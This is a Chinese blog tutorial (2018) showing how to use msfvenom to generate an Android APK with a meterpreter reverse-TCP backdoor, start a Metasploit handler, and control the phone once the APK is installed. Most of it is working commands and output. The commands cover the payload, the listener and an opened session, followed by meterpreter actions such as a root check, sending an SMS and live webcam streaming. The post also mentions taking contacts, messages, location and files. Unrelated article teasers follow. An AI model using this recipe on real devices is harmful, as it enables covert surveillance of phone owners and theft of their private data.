安科网

Kali之Metasploit生成apk后门控制安卓

深圳湾

深圳湾

2018-02-08

关注 关注

扫盲教程,大佬勿喷。

实验中请更改为你环境的IP。

生成apk后门

Kali Linux(Hack):192.168.169.76

Android(靶机):192.168.169.137

启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9486 bytes

lhost为kali的ip,lport指定一个端口。

开metasploit控制台侦听

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #对应刚才设的端口
lport => 445
msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400

复制apk出来装到手机上打开后就可以exploit了,会看到会话反弹回来。

可以看下帮助都有啥操作

meterpreter > help

功能示例

读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,还是挺强大的。

#系统信息
meterpreter > sysinfo 
Computer    : localhost
OS          : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android

#查看root状态
meterpreter > check_root 
[+] Device is rooted

#发送短信
meterpreter > send_sms 
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."

OPTIONS:

    -d  <opt>  Destination number
    -dr        Wait for delivery report
    -h         Help Banner
    -t  <opt>  SMS body text


meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >
#网页视频聊天(我手机没合适浏览器没打开)
meterpreter > webcam_chat 
[*] Webcam chat session initialized.
[-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine


#网页摄像头视频流,显示实时画面
meterpreter > webcam_stream 
[*] Starting...
[*] Preparing player...
[*] Opening player at: lwqAtUFm.html
[*] Streaming...
Kali之Metasploit生成apk后门控制安卓Kali之Metasploit生成apk后门控制安卓Kali之Metasploit生成apk后门控制安卓

补充freebuf上的文章:

如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

apk android handler payload kali metasploit meterpreter

深圳湾

深圳湾

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

【移动端】ionic cordova 打包debug调试版、release发布版

打包release发布版在工程目录下执行cordova build android --release,生成的apk就是release发布版本。app-release-unsigned.apk 就是没有签名的apk ,没有配置签名文件则默认生成。如果打包的

绿豆饼 2020-07-28

Android studio编译不同架构apk方法

后来发现该解决方法其实就是编译多个架构的apk,错误就会消失,因为直接点run,模拟器会自己选择合适的版本安装,如果手动安装就在ouput文件夹下面把相应架构的apk拖过去安装就是了。include ‘x86‘, ‘armeabi-v7a‘,‘x86_64

rookieding 2020-07-26

APK文件结构

APK是Android Package的缩写,即Android安装包,所有的Android程序都是以APK文件的形式发布的。可以在模拟器或手机上运行APK文件来安装程序。APK文件的后缀为.apk,但是其格式是压缩文件zip的格式。可以通过WinZip、W

yangChong 2020-08-03

RK:apk 系统签名

如果一个应用程序想要使用系统的方法,那么就需要给这个应用程序签名,相当于授权。经过对系统中存在的文件夹的访问测试,这种方式编译出来的APK所在进程的UID为system。

zyygive 2020-07-29

adb命令使用

1 D:\>adb shell dumpsys window | findstr mCurrentFocus. 2 file_test.txt: 1 file pushed, 0 skipped. 0.0 MB/s

yangChong 2020-07-29

adb常用命令大全

adb shell cd system/app rm *.apk21. 获取管理员权限: adb root22. 启动Activity: adb shell am start -n 包名/包名+类名。

蓝天梦 2020-07-28

VirtualBox中Alpine Linux + Docker安装记录

参照Alpine Install: from a disc to a virtualbox machine single only安装alpine会遇到一些问题,主要是网络配置和apk仓库引起的。所以在此整理了下自己的安装过程。启动后,修改alpine的网

zyygive 2020-06-11

Jenkins 打包 Android

echo "======building version======";$versionDate=Get-Date -Format ‘yyyyMMddHHmmss‘;echo "v$versionDate";$app

zyygive 2020-06-09

anbox安装apk

a.要下载的东西基本被墙,或是很慢。b.脚本里的路径不对

ApkCore 2020-05-28

飞凌i.MX6Q开发板Android系统下可以实现APP签名啦!速来

以下操作在 飞凌嵌入式 Cortex-A9 i.MX6Q开发板已经验证成功,其它平台请参考使用。在 使用 Android源码中的APP源码做参考做Android应用时,安装不到开发板上,eclipse中调试信息如下:。xml version = &qu

安辉 2020-05-27

alpine apk软件管理包常用命令总结

卸载命令卸载并删除packagesapk del tzdata busybox-extras fontconfig ttf-dejavu. 升级upgrade命令升级系统已安装的所以软件包,当然也可指定仅升级部分软件包。apk update #更新最新本

KarlMarxs 2020-05-15

安卓逆向11.IDA以Debug模式调试APK SO

有时候,我们需要调试APK启动过程中的SO文件里的函数,使用附加的方法显然时机已经晚了!比如想要调试SO库的JNI_Onload函数,很多时候需要在程序启动的时候就附加并且调试!

xilove0 2020-04-20

.net core容器添加时区和libgdi+和下载加速

国内.net core镜像下载加速。国内访问可以把mcr.microsoft.com改为mcr.azk8s.cn. 修改时区和安装libgdi+. 根据基础镜像不同添加的命令也不同。alpine的包管理器是apk,安装软件命令是apk add. 第一行是替

laijunfeng 2020-04-07

《自拍教程》aapt_apk信息查看工具

是android sdk自带的用于打包apk,解析apk的命令行工具软件。aapt.exe经常被Python调用用于解析App,一般在.\sdk\build-tools\android-***\的路径下。测试人员可通过这个工具,解析apk文件,获取apk的

KarlMarxs 2020-02-23

adb命令

我们在进行测试的时候,我们肯定需要查看设备连接是否成功,设备的信息是否能够获取。adb devices 就可以实现,直接在命令行控制台中输入“ adb devices ”。adb devices即可列出所链接的android设备。也可以让 adb以 roo

Soinice 2020-02-18

APK反编译再打包并重签名

jarsigner.exe -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore test.jks -storepass 12345678 Hello.apk key0. 上面表示签名算法为“SHA

zyygive 2020-02-17

HTML/网站一键打包APK工具(html网页打包安卓APP应用)

“HMTL一键打包APK工具”可以把网站打包为一个安卓应用APK文件,无需编写任何代码,支持在安卓设备上安装运行。这是由于项目中某些文件含有中文造成的,请修改项目文件的名称,确保不含有中文后再打包

ProgrammerFan00 2020-02-16

黑客与程序员的必备神器APK-内附下载链接(不定期更新)

来自华为的文件管理器 HiDisk. 另一个简洁实用功能很全的Explore. 最强大的安卓终端模拟器,没有之一。一个轻量级的终端模拟器。安卓渗透工具 Drozer APK . 大神开发的基于XPosed的APK动态分析工具。安卓系统超级用户权限管理工具。

Ubuntu黑客 2020-02-14

Android apk签名详解——AS签名、获取签名信息、系统签名、命令行签名

Apk签名,每一个Android开发者都不陌生。它就是对我们的apk加了一个校验参数,防止apk被掉包。一开始做Android开发,就接触到了apk签名;后来在微信开放平台、高德地图等平台注册时,需要填写apk签名的md5值和sha256值;再后来做系统应

89590098 2020-02-01

XamarinAndroid通过修改项目链接器属性缩减打包APK体积

使用vs2019,建立一个Android单一页面应用,直接生成APK的大小是67.9MB. 项目属性里的Android选项,里边的链接器属性,有一项“链接”,VS的提示是:。项目默认的选项是“无”,我们把选项改成“仅SDK程序集”,再一次生成APK,大小是

zyygive 2020-01-30
深圳湾

深圳湾

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号